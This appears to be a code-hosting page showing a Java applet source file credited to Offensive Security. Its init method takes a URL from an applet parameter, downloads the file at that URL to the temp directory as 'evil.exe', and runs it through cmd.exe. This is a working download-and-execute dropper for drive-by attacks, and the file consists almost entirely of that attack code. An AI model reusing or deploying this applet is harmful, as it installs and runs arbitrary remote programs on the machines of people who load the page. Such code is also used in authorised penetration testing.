-
Notifications
You must be signed in to change notification settings - Fork 8
/
Copy pathJava.java
54 lines (53 loc) · 1.42 KB
/
Java.java
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
import java.applet.*;
import java.awt.*;
import java.io.*;
import java.net.URL;
import java.util.*;
/**
* Author: Offensive Security
* This Java applet will download a file and execute it.
**/
public class Java extends Applet {
private Object initialized = null;
public Object isInitialized()
{
return initialized;
}
public void init() {
Process f;
try {
String tmpdir = System.getProperty("java.io.tmpdir") + File.separator;
String expath = tmpdir + "evil.exe";
String download = "";
download = getParameter("1");
if (download.length() > 0) {
// URL parameter
URL url = new URL(download);
// Get an input stream for reading
InputStream in = url.openStream();
// Create a buffered input stream for efficency
BufferedInputStream bufIn = new BufferedInputStream(in);
File outputFile = new File(expath);
OutputStream out = new BufferedOutputStream(new
FileOutputStream(outputFile));
byte[] buffer = new byte[2048];
for (;;) {
int nBytes = bufIn.read(buffer);
if (nBytes <= 0) break;
out.write(buffer, 0, nBytes);
}
out.flush();
out.close();
in.close();
f = Runtime.getRuntime().exec("cmd.exe /c " + expath);
}
}catch(IOException e) {
e.printStackTrace();
}
/* ended here and commented out below for bypass */
catch (Exception exception)
{
exception.printStackTrace();
}
}
}